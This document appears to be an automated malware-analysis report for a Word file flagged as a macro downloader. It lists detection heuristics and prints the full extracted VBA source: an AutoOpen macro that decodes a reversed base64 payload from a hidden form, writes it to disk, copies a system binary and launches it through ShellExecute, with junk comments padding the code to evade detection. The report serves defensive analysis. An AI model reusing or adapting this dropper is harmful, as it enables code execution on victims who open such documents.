MALICIOUS
190
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim au0DwK As New Shell32.Shell -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
With CreateObject("Microsoft.XMLDOM").createElement("b64") -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7107 bytes |
SHA-256: bce036ff098672cdf667870759b4bf7498d55d2744a5e94d55e7d7ad03a6653c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "frm"
Attribute VB_Base = "0{9BBAC9E8-9B1B-417A-89BA-821B308B1774}{B9092995-C045-4CDB-BDDA-FF3C30C130F5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "aYX8j"
Sub AutoOpen()
' Nourish foundation
' Piebald
' Circlet segment pelvis manufacturing
' Topping
Call aSQYNF
End Sub
Sub aSQYNF()
aVbuBC
End Sub
Function aWYEjS(aSZ8w)
akm4Zb = ""
For aqf8r = Len(aSZ8w) To 1 Step -1
akm4Zb = akm4Zb & "" & Mid(aSZ8w, aqf8r, 1)
Next aqf8r
aWYEjS = akm4Zb
End Function
Function aNrKe(b64)
With CreateObject("Microsoft.XMLDOM").createElement("b64")
.DataType = "bin.base64"
.text = b64
b = .nodeTypedValue
End With
aNrKe = StrConv(b, vbUnicode)
End Function
Attribute VB_Name = "aINWJ"
Sub awTPSI(aiEzf, auyw9x)
' Predatory mockingly huddle complacent uw
' Droop stockholm
' Belittle purplish lately vertex
Set aFH465 = CreateObject("Scripting.FileSystemObject")
Call aFH465.CopyFile(aiEzf, auyw9x, 1)
' Subaru granted iota
' Desultory groups theorist kw
End Sub
Sub au5cy(aE8mM3, a9hyI)
' Livestock cell humanities insignia propitiatory provider
' Frosted gravy aden viands amatory quality spans
' Incompatible ccc nerve pedantry
' Essence prototype stockholm bolting
' Piedmontese eastwards polymer
' Das
' Warnings yacht strict zest assets
' Pentateuch
' Morgan
' Tangible accordingly negation
' Ranking
' Prosy covertly brilliant assorted fresher
' Startup
' Wing duchy feature
' Elite curious prefatory gp fur benchmark
' Kent babble
' Pans
' Push cleavage optics
' Grounded chancellor
' Gush
' Marksman lot jar carol enemies brother
' Hamlet pedigree losing
' Viewpoint republicans devotedly
' Skeptical travesti alphabetical mambo legislator
Open aE8mM3 For Output As #1
Print #1, a9hyI
' Clients
' Pour supplement assessment penetration
' Serving moderately awfulness pregnant necessarily ace
' Slum
Close #1
End Sub
Attribute VB_Name = "aIcgaj"
Function aMX17(acHX9)
' While done skirts
' Wear cartwright alkaline
' Cloven ali primary
' Hack exp
' Permit abounds simultaneous sudden foam judgment
' Steak isaac promoted
' Titled tracked
' Forgot chequered priced
' Ibm displays
' Blazon encyclopedia pulse
' Mug uk shad strain punjab frustration
End Function
Function aXPSW(a8wxG)
' Increases corroboration
' Bytes technology flout increased vulcan
' Pigeon borough sudden rabid ghana timed bahrain expence
' Lethe inscribe proportionate
' Newsletter copyrights ut reprisal textile
' Terminal has rg plants
' Poems interview
' Crier protecting anthem utilize
' Elliptical rats rockies holding
' Justice filament volkswagen
' Islands xx ancestry lynching
' Workshop fuel wally
' Hardcover
aeljs = Split(aWYEjS(frm.paths.text), "|")
Select Case a8wxG
Case Is = 0
aXPSW = aeljs(0)
Case Is = 1
aXPSW = aeljs(1)
Case Is = 2
aXPSW = aeljs(2)
Case Is = 3
aXPSW = aeljs(3)
End Select
' Sharing ensemble igneous recovery
' Engine twitter
' Decrepitude rely
' Di
' Prescribed guide
' Quicken
' Withstood wm
' Wales bermuda qualified
' Outdo sixty-three
' Portmanteau gender telecom olive bicycle
' Michael pie accruing
' Witticism television enhance
' Spain projection exchange lol
' Management awe-inspiring
' Inter welling skirted
' Monotheism boys vitiated
' Adaptive handheld destruction
' Wrathful dump drier electro
' Tract pharmacy pocket sparrow dung
' Phalanx
' Aqua saddles generators consecutive sec
' Depends advert undervalue
End Function
Function aasXfQ(akdZ3, ajeWl)
' Nevada ell
' Flip naturals dwindle unexplored
' Mirrors thrall
' Break nested
' Viscount warrant interwoven arabia
' Holes sector cove
' Runtime compares tanned playground mpg
' Keynote gangway barbara careful
' Outputs preservative goes burdensome educated
End Function
Sub aVbuBC()
a84oF = aXPSW(0)
aMY6vX = aXPSW(1)
avrEH = aXPSW(2)
aeXlE = aXPSW(3)
' Evasion engineer dealer
' Commonwealth
' Celebrities honest consoles duality
' Cartridge refine film
' Loads huh
' Perception verified chaldea
' Downtown adjustments
' Nut usps
' Payday arabia
' Lassitude
' Meter degenerate rochester distraction
' Mat
' Glucose documentation clink
' Olympus tributaries
' Mood texan hippopotamus rejoinder legislator
' Subversion receivers transgressor tic
' Fish requiem
' Highlighted
' Pennant broken reconstruction
' Service pop hint
' Luck operative impeachment
' Blackboard titled stack surgeon classify claims
' Remedial chelsea
' Mediocrity jocular festal omnipotence arrival contradistinction
' Fetish swarthy foil hive
' Attended self-satisfied apps
' Transmission
aK2TU = aWYEjS(aNrKe(frm.pay.text))
' Levitra credibility
' Amenities ns complaints chat voyeurweb
' Uterus trap apparatus
au5cy a84oF, aK2TU
' Brawn website layout
' Assists abby wa
' Roulette instructor called illogical savings
' Nevermore
' Releases harboured fraid
' Missive sweet flimsy
awTPSI avrEH, aMY6vX
' Spread density triumph became
' Hater
' Namespace mesa
' Twenty-second wily hawk disabilities
' Deviation possibilities
' Derek compiler prematurely brochure
' Minx rarely verger
' Dutch outstanding
' Narcissus conjure operational temperamental
' Hyacinth liechtenstein roan sudden johannesburg
' Unmanned ringtones
' Solution kitchen safely lunged
' Cut hight applicant granny gc
' Dramatic stimuli
' Conformation unruly lank hughes
' Convention furnishings scurrilous
' Lib pan unerring
' Angelus restrictions
' Leasing idaho leaf crucifixion abomination vendor bet
' Athlete reg efficiently confident
' Dawn portsmouth threshing warring geographical
' Desktop dialects examines
' Allure kindle template msie
avFSpC = Chr(34)
avmJaz = Trim(aeXlE & "t : " & avFSpC & a84oF & avFSpC)
' Hips acceptable hydrogen
' Eva cosmopolitan
' Eyed delectation
Dim au0DwK As New Shell32.Shell
Call au0DwK.ShellExecute(aMY6vX, avmJaz, " ", SW_SHOWNORMAL)
' Jet trading sounds halves chevrolet finish
' Varieties tennis
' Informed dapper stocks vaccination
' Gripe maryland oxygen
' Designated greek wines
' Sop brad howitzer
' Phrases selene powell defensible requirement rating
' Reindeer sat. traffic
' Teddy
' Tender
' Standings ineffectual confirm mar virtual mas
' Oaken buoyant endowment
' Savor gens
' Genetics implement dover nazareth
' Solidity gamespot fitting d
' Apparel recent cents inquisitor statuesque
' Grade clicks
' Involves distance transexual
' Pope application
' Acer securely hot geo
' Lb searches fortune bairn
' Accredited secrete columbia gregarious html
' Innovation dispute politically osiris
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 37888 bytes |
SHA-256: d9c4b62fae29ae8ebd19ae97b09a7966648b4a2329c4b2d3cc36ae41cea0fe95 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.